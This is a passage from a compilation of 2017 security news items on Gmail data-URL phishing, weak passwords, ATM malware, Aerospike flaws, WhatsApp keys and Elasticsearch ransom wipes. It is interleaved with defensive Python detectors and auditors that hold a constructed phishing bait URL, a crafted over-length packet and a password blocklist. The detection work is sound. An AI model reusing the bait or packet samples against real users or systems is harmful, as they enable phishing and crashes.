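            payload = base64.b64decode(padded).decode("utf-8", "replace")
        except ValueError:
            payload = ""                                # undecodable: nothing to inspect
    else:
        payload = unquote(payload)
    return media_type, is_b64, payload


def findings_for_url(url: str) -> List[str]:
    """List reasons an address-bar URL should not be trusted as a login page.
    An empty list means the URL is https and the host is on the allow-list."""
    out: List[str] = []
    scheme = url.split(":", 1)[0].strip().lower()
    if scheme == "https":
        host = (urlsplit(url).hostname or "").lower()
        if host not in TRUSTED_LOGIN_HOSTS:
            out.append(f"https host {host!r} is not an expected login host")
        return out
    if scheme == "blob":
        out.append("blob: URL: the page was generated locally, not served by the origin")
        return out
    if scheme != "data":
        out.append(f"scheme {scheme!r} is not https")
        return out
    media_type, is_b64, payload = split_data_url(url)
    encoding = ", base64" if is_b64 else ""
    out.append(f"data: URL ({media_type}{encoding}): no server and no certificate behind it")
    match = HOST_RE.search(payload)
    if match and match.group(1).lower() in TRUSTED_LOGIN_HOSTS:
        out.append(f"payload opens with a lookalike of {match.group(1)}")
    if PADDING_RE.search(payload):
        out.append("long whitespace run pushes the rest of the payload off-screen")
    if SCRIPT_RE.search(payload):
        out.append("payload contains script markup")
    return out


if __name__ == "__main__":
    # Constructed bait URL with the structure described in the article.
    bait = ("data:text/html,https://accounts.google.com/ServiceLogin?service=mail"
            + " " * 200 + "<script>/* placeholder */</script>")
    for reason in findings_for_url(bait):
        print("-", reason)
```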

This technique is not new; several victims reported similar attacks in July.

One of the main characteristics of the attacks recently detected by the experts is that the crooks immediately accessed the compromised accounts and used them to send phishing emails to all of the victim’s contacts. It is still unclear whether the attackers have found a way to automate the process.

Tom Scott (@tomscott), 23 Dec 2016, 12:54 PM:
This is the closest I've ever come to falling for a Gmail phishing attack. If it hadn't been for my high-DPI screen making the image fuzzy…
6,132 Retweets 5,310 likes
As usual, let me suggest enabling two-factor authentication (2FA) on Gmail in order to avoid falling victim to this powerful phishing scheme. However, if the cyber criminals immediately access the compromised account, they could also prompt for the 2FA code on the phishing page.

“2FA would make it harder to exploit, but phishing attacks are getting fancier. They capture the 2FA code you enter and immediately start a session elsewhere with your password and 2FA. Hardware 2FA, a security key, (such as a Yubikey) is the only likely way to prevent phishing (excluding targets of state actors)” wrote a user in a discussion on Hacker News.

Google has been aware of this phishing tactic since at least March 2016; for this reason, the Chrome security team suggested introducing a “Not Secure” tag in the address bar for data:, blob: and other URLs that may be exploited by phishers.

Weak passwords are still the root cause of data breaches

16.1.2017 securityaffairs Hacking

Key findings of a new study by Keeper Security, which analyzed 10 million hacked accounts from breached data dumps to find the most popular passwords.
Users’ bad habits are still one of the biggest problems for the IT industry: weak passwords and their reuse on multiple websites potentially expose a billion users to cyber attacks every day.

I’m not surprised by the results of a new study conducted by the security firm Keeper Security that analyzed 10 million hacked accounts from breached data dumps for the most popular passwords.

Below is the Top 10 of Keeper Security’s 2016 most popular password list:

The most used passwords continue to be 123456 and 123456789, despite numerous awareness campaigns on proper security posture; “123456” alone accounts for 17 percent of the hacked accounts the firm used as its data sample.

“Looking at the list of 2016’s most common passwords, we couldn’t stop shaking our heads. Nearly 17 percent of users are safeguarding their accounts with “123456.” What really perplexed us is that so many website operators are not enforcing password security best practices.” states the report published by Keeper Security. “We scoured 10 million passwords that became public through data breaches that happened in 2016.”

The bad news is that the list of most popular passwords hasn’t changed over the years.

“The list of most frequently used passwords has changed little over the past few years. That means that user education has limits.” continues the study.

This highlights the lack of a security policy that also mandates the use of strong passwords and enforces it. Four of the top 10 passwords on the list are six characters or shorter, which makes them very easy to brute force if the system is not properly protected.

“today’s brute-force cracking software and hardware can unscramble those passwords in seconds. Website operators that permit such flimsy protection are either reckless or lazy.”

The list also includes passwords like “1q2w3e4r” and “123qwe”; it is likely that some users try such keyboard patterns in the belief that they are unpredictable. Unfortunately, dictionary-based password crackers include these variations.

The last point that emerges from the report is that email providers do not correctly monitor the use of their services by botnets used for spam.

“Security expert Graham Cluley believes that the presence of seemingly random passwords such as “18atcskd2w” and “3rjs1la7qe” on the list indicates that bots use these codes over and over when they set up dummy accounts on public email services for spam and phishing attacks.” states the report.
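The two observations above, keyboard-walk favourites such as “1q2w3e4r” that operators still accept, and random-looking strings like “18atcskd2w” that recur because bots register throwaway accounts with them, both reduce to checks an operator can run. The Python below is an added example, not Keeper's code or data; the blocklist, thresholds and sample dump are constructed from the values the report names.

```python
"""Two checks drawn from the report above. Added example, not Keeper's code;
the blocklist and the sample dump are constructed here from values the
report names ('123456', '1q2w3e4r', '123qwe', '18atcskd2w', '3rjs1la7qe')."""
from collections import Counter
from typing import Dict, List

BLOCKLIST = {"123456", "123456789", "1q2w3e4r", "123qwe", "qwerty", "password"}
MIN_LENGTH = 8
WALK_THRESHOLD = 0.6          # share of neighbouring key pairs that marks a walk

# Keyboard rows as cheap crackers enumerate them (left to right).
KEY_ROWS = ("1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm")


def _adjacent_keys(a: str, b: str) -> bool:
    """True when a and b sit next to each other on the same keyboard row."""
    for row in KEY_ROWS:
        i, j = row.find(a), row.find(b)
        if i >= 0 and j >= 0 and abs(i - j) == 1:
            return True
    return False


def keyboard_walk_ratio(pw: str) -> float:
    """Fraction of character pairs that are keyboard neighbours.

    Pairs two apart are tested too, because '1q2w3e4r' interleaves the digit
    row with the top letter row and every other character is a walk step.
    """
    p = pw.lower()
    if len(p) < 2:
        return 0.0
    steps = sum(_adjacent_keys(a, b) for a, b in zip(p, p[1:]))
    skip_steps = sum(_adjacent_keys(a, b) for a, b in zip(p, p[2:]))
    return max(steps, skip_steps) / (len(p) - 1)


def check_password(pw: str) -> List[str]:
    """Reasons to reject a candidate password at sign-up; empty means accept."""
    reasons: List[str] = []
    if pw.lower() in BLOCKLIST:
        reasons.append("on the breach-derived blocklist")
    if len(pw) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    if keyboard_walk_ratio(pw) >= WALK_THRESHOLD:
        reasons.append("keyboard walk pattern")
    return reasons


def looks_random(pw: str) -> bool:
    """A string a human is unlikely to pick twice: long, mixed letters and
    digits, not a keyboard walk, not a known favourite."""
    return (len(pw) >= 8
            and any(c.isdigit() for c in pw)
            and any(c.isalpha() for c in pw)
            and keyboard_walk_ratio(pw) < 0.3
            and pw.lower() not in BLOCKLIST)


def recurring_random_passwords(dump: List[str], min_count: int = 3) -> Dict[str, int]:
    """Random-looking passwords that still appear min_count or more times.

    Humans do not independently invent '18atcskd2w'; a bot registering
    throwaway accounts with a fixed password does, which is the signal the
    report attributes to spam botnets."""
    counts = Counter(dump)
    return {pw: n for pw, n in counts.items()
            if n >= min_count and looks_random(pw)}


# Constructed sample dump (not Keeper's data).
SAMPLE_DUMP = ["123456", "18atcskd2w", "123456789", "18atcskd2w", "3rjs1la7qe",
               "1q2w3e4r", "18atcskd2w", "3rjs1la7qe", "Sunsh1ne!", "3rjs1la7qe",
               "123456", "123qwe", "123456"]

if __name__ == "__main__":
    for candidate in ("123456", "1q2w3e4r", "Tr0ub4dor&3"):
        print(candidate, check_password(candidate) or "accepted")
    print(recurring_random_passwords(SAMPLE_DUMP))
```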


Intelligence report claims the Kremlin has cracked Telegram service
16.1.2017 securityaffairs
A raw intelligence document published last week claims Russian cyber experts have cracked Telegram messaging service to spy on opponents.
A raw intelligence document published last week contains a lot of information about President Donald Trump and the Kremlin’s approach to cyber espionage.

According to the report, the Russian Federal Security Service (FSB) offers bribes for back doors into commercial products, and it recruits black hat hackers by every means, including blackmail and coercion. The document reports that the FSB used the sale of cheap PC games containing malware to compromise machines. The report also reveals that Russian intelligence has cracked the popular Telegram instant messaging service.

The intelligence report was prepared by a former British agent, who received the information about the hack of the Telegram service from a “cyber operative.”

“His/her understanding was that the FSB now successfully had cracked this communication software and therefore it was no longer secure to use,” reads the document.

Telegram was used by opponents of the government, which is why the FSB decided to crack it. Telegram is the work of two Russian brothers and billionaires, Nikolai and Pavel Durov, who had previously created Vkontakte, an alternative to Facebook. However, they got in trouble over a Ukrainian personal data issue and fled from Russia to Berlin in 2014.

Telegram relies on a custom encryption scheme of its own design, and for this reason security experts and privacy advocates have repeatedly raised questions about its security.

When it comes to cyberattacks, Russia’s offensive tactics include targeting foreign governments, especially Western governments; penetrating foreign corporations, especially banks; monitoring of the domestic elite; and attacking political opponents inside Russia and abroad.

According to the cyber operative, the Russian government received the support of an IT staffer at Telegram.


In one instance, Russian intelligence compromised IT equipment used by a foreign director of a Russian state-owned enterprise in order to conduct cyber espionage on Western organizations via a backdoor.

The FSB offered a U.S. citizen of Russian descent funding for an IT startup in exchange for a backdoor into the software developed by the company. In this way, Russian cyber spies could deliver malware to launch targeted attacks.

The intelligence document doesn’t provide further details on the cyber operations conducted by Russian hackers.

As expected, the document also notes the interest in representatives of the G7 governments and NATO.

“External targets include foreign governments and big corporations, especially banks,” the document says, but mainly succeeds only among lower level targets. It says it has “limited success in attacking top foreign targets like G7 governments, security services and but much more on second tier ones through IT back doors, using corporate and other visitors to Russia.”

In order to target G7 governments, nation-state actors hit second-tier organizations, including western private banks and the governments of smaller states that are allied with the Western states.

“Hundreds of agents, either consciously cooperating with the FSB or whose personal and professional IT systems had even unwittingly compromised, were recruited,” continues the document.

Russian institutions also suffer cyber attacks from multiple cyber gangs, including Carbanak, Buhtrap and Metel.

“The Central Bank of Russia claimed that in 2015 alone there had been more than 20 attempts at serious cyber embezzlement of money from corresponding accounts held there, comprising several billions of Rubles,” continues the report.

New campaign leverages RIG Exploit kit to deliver the Cerber Ransomware
16.1.2017 securityaffairs
Experts from Heimdal Security warned of a spike in cyber attacks leveraging the popular RIG Exploit kit to deliver the Cerber Ransomware.
The RIG exploit kit is increasingly popular in the criminal ecosystem; a few days ago security experts at Heimdal Security warned of a spike in cyber attacks leveraging the popular Neutrino and RIG EKs.

Now security experts from Heimdal Security are warning of a new campaign leveraging the RIG exploit kit that targets outdated versions of popular applications to distribute the Cerber ransomware.

The attackers leverage an array of malicious domains to launch drive-by attacks against visitors, trying to exploit flaws in outdated versions of popular applications such as Flash, Internet Explorer, or Microsoft Edge.

“At the moment, cybercriminals are using a swarm of malicious domains to launch drive-by attacks against unsuspecting users.” states the analysis published by Heimdal Security.

“The campaign works by injecting malicious scripts into insecure or compromised systems. Victims can get infected simply by browsing the compromised or infected websites, without clicking on anything. What exposes them to this attack are outdated versions of the following apps: Flash Player, Silverlight, Internet Explorer or Edge.”

The crooks compromise websites to inject malicious scripts that exploit flaws in the victim’s browser without any user interaction.

RIG Exploit kit

This new campaign leverages a RIG exploit kit that attempts to exploit the following 8 vulnerabilities:

According to the experts from Heimdal Security, this variant of the RIG exploit kit is the Empire Pack version (RIG-E). Cyber criminals also abused domains that are part of the so-called pseudo-Darkleech gateway, which was also used by cyber gangs in June 2016 to deliver the CryptXXX ransomware in several campaigns leveraging the Neutrino Exploit Kit.

It is important to highlight that the success of campaigns like this one depends on the failure to apply security updates to popular software.

“As you can see, cybercriminals often use vulnerabilities already patched by the software developer in their attacks, because they know that most users fail to apply updates when they’re released. In spite of the wave of attacks, many Internet users still choose to ignore updates, but we hope that alerts such as this one will change their mind and make them more aware of the key security layer that updates represent.” states the report.

Ploutus-D, a new variant of Ploutus ATM malware spotted in the wild
15.1.17 securityaffairs

Security experts from FireEye have spotted a new variant of the infamous Ploutus ATM malware that infected systems in Latin America.
Ploutus is one of the most sophisticated ATM malware families; it was first discovered in Mexico back in 2013. The threat allows crooks to steal cash from ATMs using either an external keyboard attached to the machine or by sending it SMS messages.

Experts at FireEye Labs have recently discovered a new version of the Ploutus ATM malware, dubbed Ploutus-D, that works on KAL’s Kalignite multivendor ATM platform.

The experts observed Ploutus-D in attacks against ATMs made by the vendor Diebold, but the most worrisome aspect of the story is that minor changes to the malware code could allow Ploutus-D to target a wide range of ATM vendors in 80 countries.

Below are the improvements introduced in Ploutus-D:

It uses the Kalignite multivendor ATM Platform.
It could run on ATMs running the Windows 10, Windows 8, Windows 7 and XP operating systems.
It is configured to control Diebold ATMs.
It has a different GUI.
It comes with a Launcher that attempts to identify and kill security monitoring processes to avoid detection.
It uses a stronger .NET obfuscator called Reactor.
The similarities between Ploutus and Ploutus-D are:

The main purpose is to empty the ATM without requiring an ATM card.
The attacker must interact with the malware using an external keyboard attached to the ATM.
An activation code is generated by the attacker, which expires after 24 hours.
Both were created in .NET.
Both can run as a Windows service or as a standalone application.
The technical analysis revealed that developers improved obfuscation of the code by switching from .NET Confuser to Reactor.

The malware adds itself to the “Userinit” registry key to gain persistence; the key is located at:

\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
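Because Winlogon runs every program listed in that value at each logon, a defender can detect this persistence by diffing the value against the single expected entry. The Python below is an added detection example, not FireEye's code; the expected path and the sample values are constructed, and the value is passed in as a string (for instance from a registry export) so the check runs off-host.

```python
"""Flag extra entries in the Winlogon Userinit value. Added example, not
FireEye's code; expected and sample values are constructed. The value is
passed in as a string (e.g. from a registry export), so it runs off-host."""
import ntpath
from typing import List

# Windows' default for the value. A clean value is this path plus a trailing comma.
EXPECTED_USERINIT = r"C:\Windows\system32\userinit.exe"


def parse_userinit(value: str) -> List[str]:
    """Split the comma-separated list Winlogon reads, dropping empties and quotes."""
    entries = []
    for raw in value.split(","):
        entry = raw.strip().strip('"')
        if entry:
            entries.append(entry)
    return entries


def _norm(path: str) -> str:
    # NTFS paths are case-insensitive; normalise separators and case before comparing.
    return ntpath.normpath(path).lower()


def audit_userinit(value: str, expected: str = EXPECTED_USERINIT) -> List[str]:
    """Return every entry that is not the expected userinit.exe.

    Winlogon launches each listed program at every interactive logon, so any
    extra entry (a launcher dropped by an attacker, for instance) is
    persistence. An entry named userinit.exe in another directory is also
    reported, since only the real path is trusted.
    """
    return [entry for entry in parse_userinit(value)
            if _norm(entry) != _norm(expected)]


if __name__ == "__main__":
    # Constructed sample: the default value and one with an extra program.
    for sample in (r"C:\Windows\system32\userinit.exe,",
                   r"C:\Windows\system32\userinit.exe,C:\ProgramData\Launcher.exe,"):
        print(sample, "->", audit_userinit(sample) or "clean")
```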

The attacker must interact with the Launcher by connecting a keyboard to the ATM USB or PS/2 port as illustrated in the following picture.


“Once the Launcher has been installed in the ATM, it will perform keyboard hooking in order to read the instructions from the attackers via the external keyboard. A combination of “F” keys will be used to request the action to execute” states the analysis.

The Launcher drops legitimate files onto the system, such as the KAL ATM software, along with Ploutus-D. This makes sure that all the software and versions needed to properly run the malware are present in the same folder, avoiding any dependency issues.

Ploutus-D could allow crooks to steal thousands of dollars in minutes, reducing the risk of being caught on CCTV while stealing the money.

“Once deployed to an ATM, Ploutus-D makes it possible for a money mule to obtain thousands of dollars in minutes.” states the analysis published by FireEye. “A money mule must have a master key to open the top portion of the ATM (or be able to pick it), a physical keyboard to connect to the machine, and an activation code (provided by the boss in charge of the operation) in order to dispense money from the ATM. While there are some risks of the money mule being caught by cameras, the speed in which the operation is carried out minimizes the mule’s risk.”

In order to install the malware, the attackers likely have access to the targeted ATM software. The experts also speculate that the crooks can buy physical ATMs from authorized resellers, which come preloaded with vendor software, or, in the worst case, steal the ATMs directly from a bank.

The analysis includes the main differences from previous versions and Indicators of Compromise (IOCs) that can be used to identify the threat.

Talos Team discovered serious issues in Aerospike Database Server
15.1.17 securityaffairs

Security experts from Cisco Talos discovered several flaws in the Aerospike Database Server, a high-performance, open source NoSQL database.
Security experts from Cisco Talos have discovered several vulnerabilities in the Aerospike Database Server, a high-performance, open source NoSQL database.

It is used by several major brands for high-performance applications, including Kayak, AppNexus, Adform, adMarketplace and BlueKai.

The Cisco Talos team discovered that Aerospike Database Server, and likely earlier versions, is affected by three flaws rated critical and high severity, including remote code execution and information disclosure issues.

Talos has published technical details of the vulnerabilities in the advisories that also include proof-of-concept (PoC) code for them.

“Talos is disclosing multiple vulnerabilities discovered in the Aerospike Database Server. These vulnerabilities range from memory disclosure to potential remote code execution. This software is used by various companies that require a high performance NoSQL database. Aerospike fixed these issues in version 3.11.” reads the advisory published by the Talos Team.

TALOS-2016-0264 (CVE-2016-9050) – Aerospike Database Server Client Message Memory Disclosure Vulnerability
TALOS-2016-0266 (CVE-2016-9052) – Aerospike Database Server Index Name Code Execution Vulnerability
TALOS-2016-0268 (CVE-2016-9054) – Aerospike Database Server Set Name Code Execution Vulnerability.
Aerospike Database Server
The first security vulnerability, tracked as CVE-2016-9050, is an out-of-bounds read issue that affects the client message-parsing functionality. An attacker can exploit it by sending a specially crafted packet to the listening port which can result in memory disclosure or a denial-of-service (DoS) condition.

A second vulnerability, tracked as CVE-2016-9052, is an arbitrary code execution flaw in a different function, namely “as_sindex__simatch_by_iname.”

The third, tracked as CVE-2016-9054, is a stack-based buffer overflow in the querying functionality, specifically the “as_sindex__simatch_list_set_binid” function. It is quite simple to exploit: an attacker only has to connect to the listening port and send a specially crafted packet that triggers the vulnerability in order to execute arbitrary code remotely.

The flaws were reported to the Aerospike development team on December 23, and they were addressed on January 5 in version 3.11.0.

Talos has published advisories containing technical details and proof-of-concept (PoC) code for each of the vulnerabilities.
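The common thread in these three findings is a length or name taken from the wire and used before it is checked against the bytes actually received. The following is an added example, not Aerospike's code and not its wire format (the two-byte field count and the type/length/value layout are a hypothetical format constructed for illustration); it shows the validation a message parser has to perform so that a packet declaring more data than it carries is rejected instead of being read past the end of the buffer:

```python
import struct

# Hypothetical wire format, constructed for this example (NOT Aerospike's protocol):
#   uint16 big-endian field count, then fields of [uint8 type][uint16 BE length][value]
# The point is the validation pattern: every length read from the wire is compared
# with the bytes actually present before anything is copied or compared.


class MalformedMessage(ValueError):
    """Raised instead of reading past the end of the received buffer."""


def parse_fields(buf, max_fields=64):
    """Parse `buf` into a list of (type, value) tuples, or raise MalformedMessage."""
    if len(buf) < 2:
        raise MalformedMessage("truncated header")
    (count,) = struct.unpack_from(">H", buf, 0)
    if count > max_fields:
        # Bound the loop by policy, not by the peer's number.
        raise MalformedMessage(f"field count {count} exceeds limit {max_fields}")
    pos, fields = 2, []
    for _ in range(count):
        if len(buf) - pos < 3:
            raise MalformedMessage(f"field header truncated at offset {pos}")
        ftype = buf[pos]
        (flen,) = struct.unpack_from(">H", buf, pos + 1)
        pos += 3
        # The check native code must make before memcpy/strcmp on the value:
        # the declared length may not exceed what remains in the buffer.
        if flen > len(buf) - pos:
            raise MalformedMessage(
                f"field declares {flen} bytes but only {len(buf) - pos} remain")
        fields.append((ftype, buf[pos:pos + flen]))
        pos += flen
    if pos != len(buf):
        raise MalformedMessage(f"{len(buf) - pos} trailing byte(s) after last field")
    return fields


def build_message(fields):
    """Serialise (type, value) tuples in the hypothetical format; used to construct samples."""
    out = struct.pack(">H", len(fields))
    for ftype, value in fields:
        out += struct.pack(">BH", ftype, len(value)) + value
    return out


def is_accepted(buf):
    """True when the parser accepts `buf`, False when it rejects it."""
    try:
        parse_fields(buf)
        return True
    except MalformedMessage:
        return False


# Constructed samples: a well-formed message, and one that declares a 65535-byte
# value while carrying only four bytes (the shape of a memory-disclosure packet).
GOOD_MESSAGE = build_message([(1, b"test_ns"), (2, b"my_set")])
CRAFTED_MESSAGE = struct.pack(">H", 1) + struct.pack(">BH", 2, 0xFFFF) + b"abcd"

if __name__ == "__main__":
    print("good:", parse_fields(GOOD_MESSAGE))
    print("crafted accepted?", is_accepted(CRAFTED_MESSAGE))
```

The same three checks (bounded count, header fits, declared length fits) are what a fuzzer exercises when it mutates length fields; a parser that passes them cannot be driven into a read past the buffer by a single packet.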

Student Faces 10 Years In Prison For Creating And Selling Limitless Keylogger
15.1.2017 thehackernews

A 21-year-old former Langley High School student, who won a Programmer of the Year Award in high school, pleaded guilty on Friday to charges of developing and selling custom key-logging malware that infected thousands of victims.
Zachary Shames from Virginia pleaded guilty in a federal district court and now faces a maximum penalty of up to 10 years in prison for his past deeds.
Shames was arrested this summer while he was working as a technical intern at Northrop Grumman, a security and defense government contractor, developing front-end site code and backend Java software and managing a MySQL database, according to what appears on his Linkedin page.
According to a press release from the U.S. Department of Justice, Shames developed a keylogger in 2013, while he was still a high school student, that allowed users to steal sensitive information, including passwords and banking credentials, from a victim's computer.
A keylogger is malicious software designed to record every keystroke on a victim's computer.

Shames developed the first versions of now-defunct keylogger known as Limitless Logger Pro, which he sold for $35 on the infamous Hack Forums, according to an anonymous security researcher quoted by Motherboard.
Shames "continued to modify and market the illegal product from his college dorm room," at James Madison University in Harrisonburg, Va. and sold it to more than 3,000 people who, in turn, infected over 16,000 victims, the U.S. Attorney's Office said.
The keylogger developed by Shames gradually grew into a powerful tool.
According to TrendMicro (pdf), apart from key-logging, Limitless KeyLogger can also recover account names and passwords from many popular applications, such as Apple Safari, Firefox, Opera, Google Chrome, Bitcoin wallets, Core FTP, DynDNS, FileZilla, Internet Download Manager, Internet Explorer, Spotify, and more.
Shames pleaded guilty in an Alexandria courtroom, and Judge Liam O'Grady accepted his plea.
Shames now faces a maximum penalty of up to 10 years in prison; sentencing is scheduled for June 16, 2017.

Explained — What's Up With the WhatsApp 'Backdoor' Story? Feature or Bug!
15.1.2017 thehackernews Hacking
What is a backdoor?
By definition, "a backdoor is a feature or defect of a computer system that allows surreptitious unauthorized access to data," whether the backdoor is in the encryption algorithm, in a server or in an implementation, and regardless of whether it has previously been used.
Yesterday, we published a story based on findings reported by security researcher Tobias Boelter that suggests WhatsApp has a backdoor that "could allow" an attacker, and of course the company itself, to intercept your encrypted communication.
The story involving the world's largest secure messaging platform that has over a billion users worldwide went viral in few hours, attracting reactions from security experts, WhatsApp team, and Open Whisper Systems, who partnered with Facebook to implement end-to-end encryption in WhatsApp.
Note: I would ask readers to read the complete article before reaching a conclusion. Suggestions and opinions are always welcome :)
What's the Issue:
The vulnerability lies in the way WhatsApp behaves when an end user's encryption key changes.
WhatsApp, by default, trusts a new encryption key broadcast by a contact and uses it to re-encrypt undelivered messages and send them, without informing the sender of the change.
In my previous article, I explained this vulnerability with a simple example, so you can head over to that article for a better understanding.

Facebook itself admitted to this WhatsApp issue reported by Boelter, saying that "we were previously aware of the issue and might change it in the future, but for now it's not something we're actively working on changing."
What Experts argued:
According to some security experts — "It's not a backdoor, rather it’s a feature to avoid unnecessary re-verification of encryption keys upon automatic regeneration."
Open Whisper Systems says — "There is no WhatsApp backdoor," "it is how cryptography works," and the MITM attack "is endemic to public key cryptography, not just WhatsApp."
A spokesperson from WhatsApp, acquired by Facebook in 2014 for $16 Billion, says — "The Guardian's story on an alleged backdoor in WhatsApp is false. WhatsApp does not give governments a backdoor into its systems. WhatsApp would fight any government request to create a backdoor."
What's the fact:
Notably, none of the security experts or the company has denied that, if required, WhatsApp (on a government request) or state-sponsored hackers could intercept your chats.
All they say is that WhatsApp is designed to be simple, and users should not lose access to messages sent to them when their encryption key is changed.
Open Whisper Systems (OWS) criticized the Guardian reporting in a blog post saying, "Even though we are the creators of the encryption protocol supposedly "backdoored" by WhatsApp, we were not asked for comment."
What? "...encryption protocol supposedly "backdoored" by WhatsApp…" NO!
No one has said it's an "encryption backdoor;" instead this backdoor resides in the way how end-to-end encryption has been implemented by WhatsApp, which eventually allows interception of messages without breaking the encryption.
As I mentioned in my previous story, this backdoor has nothing to do with the security of Signal encryption protocol created by Open Whisper Systems. It's one of the most secure encryption protocols if implemented correctly.
Then Why Is Signal More Secure Than WhatsApp?
You might be wondering why Signal Private Messenger is more secure than WhatsApp when both use the same end-to-end encryption protocol, and both are recommended by the same group of security experts who are arguing — "WhatsApp has no backdoor."
It's because there is always room for improvement.
The Signal messaging app, by default, allows a sender to verify a new key before using it, whereas WhatsApp, by default, automatically trusts the recipient's new key with no notification to the sender.
And even if the sender has turned on the security notifications, the app notifies the sender of the change only after the message is delivered.
So, here WhatsApp chose usability over security and privacy.
It’s not about 'Do We Trust WhatsApp/Facebook?':
WhatsApp says it does not give governments a "backdoor" into its systems.
No doubt, the company would definitely fight the government if it receives any such court orders and currently, is doing its best to protect the privacy of its one-billion-plus users.
But what about state-sponsored hackers? Because, technically, there is no such 'reserved' backdoor that only the company can access.
Why 'Verifying Keys' Feature Can't Protect You?

WhatsApp also offers a third security layer using which you can verify the keys of other users with whom you are communicating, either by scanning a QR code or by comparing a 60-digit number.
But here’s the catch:
This feature ensures that no one is intercepting your messages or calls at the moment you verify the keys, but it does not ensure that no one intercepted your encrypted communication in the past or will in the future, and there is currently no way for you to detect that.
WhatsApp's Protections Against Such MITM Attacks Are Incomplete

WhatsApp is already offering a "security notifications" feature that notifies users whenever a contact's security code changes, which you need to turn on manually from app settings.
But this feature is not enough to protect your communication without the use of another ultimate tool, which is — Common Sense.
Have you received a notification indicating that your contact's security code has changed?
Instead of offering 'Security by Design,' WhatsApp wants its users to use their common sense and not communicate with a contact whose security key has recently changed without first verifying the key manually.
Yet WhatsApp automatically changes your security key so frequently (for whatever reasons) that one would start ignoring such notifications, making it practically impossible for users to actively verify the authenticity of session keys every time.
What should WhatsApp do?
Without panicking all one-billion-plus users, WhatsApp can, at least:
Stop regenerating users' encryption keys so frequently (I honestly don't know why the company does so).
Give privacy-conscious users an option in the settings which, if turned on, would not automatically trust a new encryption key and send messages until the key has been manually accepted or verified by the user.
...because just like others, I also hate using two apps for communicating with my friends and work colleagues, i.e., Signal for privacy and WhatsApp because everyone uses it.

Hackers that hit MongoDB installs now switch on exposed Elasticsearch clusters
15.1.2017 securityaffairs Hacking
The hackers that targeted MongoDB installations with ransom attacks are now switching to exposed Elasticsearch clusters with a similar tactic.
A few days ago I reported news of a string of cyber attacks against MongoDB databases: hackers broke into unprotected MongoDB databases, stole their content, and demanded a ransom to return the data.
Now it seems that the same hackers have started targeting Elasticsearch clusters that are unprotected and accessible from the internet.

Elasticsearch is a Java-based search engine built on the free and open-source information retrieval library Lucene. It is released as open source and is used by many organizations worldwide.

Crooks are targeting Elasticsearch clusters with ransom attacks in the same way they did with MongoDB.

The news was reported on the official support forums this week: a user running a test deployment accessible from the internet reported that hackers had removed all the indices and created a new index named “warning”.

The user has found the following text from the raw index data:


Something quite similar to the recent ransom attacks against MongoDB.

“Late last week, a malicious attack was initiated, in which data from thousands of open source databases was copied, deleted and held for ransom. Although no malware, or “ransomware” was used in these attacks, and they are not related to product vulnerabilities, they nonetheless represent serious security incidents involving a data loss, or even a data breach.” reads the description of the discussion in the official forum. “The good news is that data loss from similar attacks is easily preventable with proper configuration.”


According to the security researcher Niall Merrigan, more than 600 Elasticsearch clusters have been targeted by the hackers.

Unfortunately, the number of internet-accessible Elasticsearch installs is much greater, roughly 35,000. The experts believe that the number of wiped Elasticsearch installs will rapidly increase, as happened with the MongoDB databases.

Niall Merrigan @nmerrigan
The #Elastic ransomware is spreading .. now 600+ hosts
8:48 AM - 13 Jan 2017
10 Retweets 3 likes
It is important to protect Elasticsearch clusters exposed on the Internet as soon as possible; there is no reason to expose them.

Researchers from the company Itamar Syn-Hershko have published a blog post that includes recommendations for securing Elasticsearch installations.

“Have a Single Page Application that needs to query Elastic and get jsons for display? Pass it through a software facade that can do request filtering, audit-logging and most importantly, password-protect your data,” states the blog post. “Without that, (a) you are for sure binding to a public IP and you shouldn’t, (b) you are risking unwanted changes to your data, (c) and the worst – you can’t control who accesses what and all your data is visible for all to see. Just what’s happening now with those Elasticsearch clusters.”

The experts also suggest disabling features that users don’t need, such as dynamic scripting with non-sandboxed languages (mvel, groovy) used in old versions.

As usual, let me suggest that you avoid paying and instead report the incident to law enforcement.
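The recommendations quoted above (do not bind to a public IP, put a facade in front, disable dynamic scripting) and the forum user's observation (all indices gone, a new index named “warning”) both translate into checks a defender can script. The following is an added example, not code from the forum thread or the blog post: it audits a flat elasticsearch.yml fragment for the bind address and the older dynamic-scripting keys, and scans `_cat/indices?v` output for the attackers' index. The dynamic-scripting setting names are those of older 1.x/2.x releases and should be treated as an assumption for other versions; the configurations and index listings are constructed.

```python
# Added example, not from the forum thread or the blog post quoted above.
# (1) audit an elasticsearch.yml fragment for the exposure the post warns about;
# (2) spot the attackers' "warning" index in `_cat/indices?v` output.

LOOPBACK_HOSTS = {"127.0.0.1", "::1", "localhost", "_local_"}

# network.host is the standard bind-address setting. The script.* keys are the ones
# older releases (1.x/2.x) used for dynamic scripting; treat them as an assumption and
# check the settings reference for the version you actually run.
DYNAMIC_SCRIPT_KEYS = {
    "script.disable_dynamic": lambda v: v in ("false", "no", "off"),  # 1.x: must be true
    "script.inline": lambda v: v in ("true", "on", "yes"),            # 1.6+: should be false
    "script.indexed": lambda v: v in ("true", "on", "yes"),
}


def parse_settings(text):
    """Flatten `key: value` lines (comments stripped) into a dict. Not a full YAML parser."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        settings[key.strip()] = value.strip().strip("'\"")
    return settings


def audit_config(text):
    """Return a sorted list of finding codes for the given elasticsearch.yml text."""
    s = parse_settings(text)
    findings = []
    host = s.get("network.host")
    if host is None:
        findings.append("network.host-unset")      # default differs by version; 1.x bound to all interfaces
    elif host not in LOOPBACK_HOSTS:
        findings.append("bound-to-non-loopback")   # reachable from the network, and ES has no auth of its own
    if any(k in s and is_bad(s[k]) for k, is_bad in DYNAMIC_SCRIPT_KEYS.items()):
        findings.append("dynamic-scripting-enabled")
    return sorted(findings)


def find_ransom_indices(cat_indices_output):
    """Names of indices called "warning" in `GET /_cat/indices?v` output (header line required)."""
    lines = cat_indices_output.strip().splitlines()
    if not lines:
        return []
    header = lines[0].split()
    if "index" not in header:
        return []
    name_col = header.index("index")
    found = []
    for line in lines[1:]:
        cols = line.split()
        if len(cols) > name_col and cols[name_col].lower() == "warning":
            found.append(cols[name_col])
    return found


# Constructed samples (uuids and sizes invented for the example).
WEAK_CONFIG = """
cluster.name: test-cluster
network.host: 0.0.0.0        # exposed on every interface
script.inline: on            # dynamic scripting left enabled
"""

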